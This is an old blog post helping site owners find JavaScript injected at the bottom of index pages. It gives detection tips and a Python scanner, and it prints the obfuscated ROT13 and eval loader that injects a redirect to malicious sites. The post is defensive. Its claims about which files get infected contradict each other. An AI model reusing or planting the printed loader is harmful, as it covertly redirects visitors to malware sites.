Tanmaya Thopate, Chincholi Morachi, Low cost WEBSITE development in Pune, Windows Tips n Tricks

Saturday, March 7, 2009

Java Injection code in IIS

If injected code in your website's pages is troubling you, the notes below should help you track it down. Here is one example of JavaScript "injection" code that inserts itself into the default page of a website. It is designed to stay hidden by redirecting visitors only arbitrarily.

Generally this code is inserted at the bottom of the source of the index or default page, separated from the end of the normal source code by a considerable amount of white space. It redirects to a "spyware" or "virus" site. It is also not detected by antivirus programs.

It infects each and every .php file and does not re-infect after the initial infection. Generally it injects the code into .php (and .html) files about 115 lines below the last line of the normal code. It ONLY infects index.php/html files in the httpdocs directory of the website.

If you rename your file to some other name, such as index2.php, it will not be infected. The "modified date" time stamps also change with the infection. Once you have the time stamp of the infection, search for other files modified at that time.
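The two checks described above (script content sitting far below the normal source after a long blank gap, and other pages modified at the time of the infection) can be automated. The following Python sketch is an added example, not code from the original post; the blank-line threshold, the marker patterns, the time window and all function names are assumptions to adjust for your own site.

```python
import os
import re
import tempfile

PAGE_EXTS = (".php", ".html", ".htm")
# Assumed markers of script content; tune them to what you find on your own site.
MARKERS = re.compile(r"<script|eval\s*\(|document\.write", re.IGNORECASE)

def trailing_injection(text, min_blank_lines=20):
    """Return content sitting after a long run of blank lines, or None.

    min_blank_lines is an assumed threshold; the post reports a gap of about 115.
    """
    gap = re.compile(r"(?:[ \t]*\r?\n){%d,}" % min_blank_lines)
    runs = list(gap.finditer(text.rstrip()))
    if not runs:
        return None
    tail = text[runs[-1].end():].strip()
    return tail if tail and MARKERS.search(tail) else None

def scan(root, infected_at=None, window=120):
    """Return (files with a suspicious tail, files modified within window seconds of infected_at)."""
    flagged, same_time = [], []
    for dirpath, _, names in os.walk(root):
        for name in names:
            if not name.lower().endswith(PAGE_EXTS):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                if trailing_injection(fh.read()):
                    flagged.append(path)
            if infected_at is not None and abs(os.path.getmtime(path) - infected_at) <= window:
                same_time.append(path)
    return sorted(flagged), sorted(same_time)

def demo():
    """Constructed sample: a clean index2.php and an index.php with a script 115 lines down."""
    root = tempfile.mkdtemp()
    clean = "<html><body>ok</body></html>\n"
    bad = clean + "\n" * 115 + "<script>/* constructed placeholder */</script>\n"
    for name, body, mtime in (("index2.php", clean, 1_000_000), ("index.php", bad, 2_000_000)):
        path = os.path.join(root, name)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)
        os.utime(path, (mtime, mtime))
    flagged, same_time = scan(root, infected_at=2_000_000)
    return [os.path.basename(p) for p in flagged], [os.path.basename(p) for p in same_time]

if __name__ == "__main__":
    print(demo())
```

To use it on a real site, call scan() with the path to the web root and, as infected_at, the modification time (in seconds since the epoch) of a page already known to be infected.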

var mf=” shapgvba ejtf(c){ine ro,con=\”HcvfNU)z\\\”n#hG1*PrTR[4`5('082BVWa]-eZo,}9g$_l+m^6bp~w&IiOA|d@s=y7C:.XMq!xtSj;k{3u\”,olq=\”\”,i,nnu,l=\”\”,n;sbe(ro=0;ro<c.yratgu;ro++){ i=c.puneNg(ro);nnu=con.vaqrkBs(i);vs(nnu>-1){ n=((nnu+1)%81-1);vs(n<=0)n+=81;l+=con.puneNg(n-1); } ryfr l+=i;}olq+=l;qbphzrag.jevgr(olq);}”,rmhc=“”;for(gvg=0;gvg<mf.length;gvg++){ fbd = mf.charCodeAt(gvg);if((fbd>64 && fbd<78)||(fbd>96 && fbd<110)) fbd=fbd+13;else if((fbd>77 && fbd<91)||(fbd>109 && fbd<123))fbd=fbd-13;rmhc=rmhc.concat(String.fromCharCode(fbd));} var km,ff; eval( rmhc );km=“<A~Msi$U7#]FT#FGla&#B#A~Msi$a>U!c~T\”G]$K;Ms$G’Ua<SeRJ:1U7#]FT#FGl\\an#B#S~Msi$\\aUSRel\\a $$i.//;;;KFccF7G#]#7s$s~AK]G$/yyT$,K&A?az!c~T\”G]$KMG=GMMGMza\\a><\\/SeRJ:1>aUmxU</A~Msi$>U; rwgs(km);
